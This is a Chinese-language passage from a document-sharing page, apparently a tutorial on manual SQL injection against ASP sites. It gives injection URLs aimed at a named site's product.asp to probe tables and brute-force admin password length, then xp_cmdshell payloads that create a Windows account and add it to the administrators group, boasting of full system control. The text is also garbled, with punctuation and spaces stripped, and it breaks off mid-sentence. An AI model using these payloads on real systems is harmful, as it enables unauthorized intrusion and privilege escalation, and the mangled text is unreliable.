还剩1页未读,继续阅读
文本内容:
纯手工注射ASP脚本学习电脑资料手工注射ASP脚本技术ACCESS查询数据库类型.zengke./product.aspsort_id=24and existsselect*from sysobjects查询表admin页面返回正常显示为有,错误为无,.zengke.//product.aspsort_id=24and existsselect*from admin查询admin表中的项admin/product.aspsort_id=24and existsselect admin_name fromadmin查询admin表中的项admin里面的内容长度小于出错等于返回正常.zengke.//product.aspsort_id=24And SelectTop1lencstr[pwd]From SelectTop1*From[admin]Where1=1order by[pwd]T orderby[pwd]desc=7暴力猜解admin表中的项admin_name SQL
①Site/url.aspid=1;exec master..xp_cmdshell“user namepassword/add”--分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用命令新建了用户名为n ame、密码为password的windows的帐号,接着
②Site/url.aspid=1;exec master..xp_cmdshell“localgroup administratorsname/add”--将新建的帐号name加入员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的,
③Site/url.aspid=1;;and db_name0前面有个类似的例子and user0,作用是获取连接用户名,db_name是另一个系统变量...。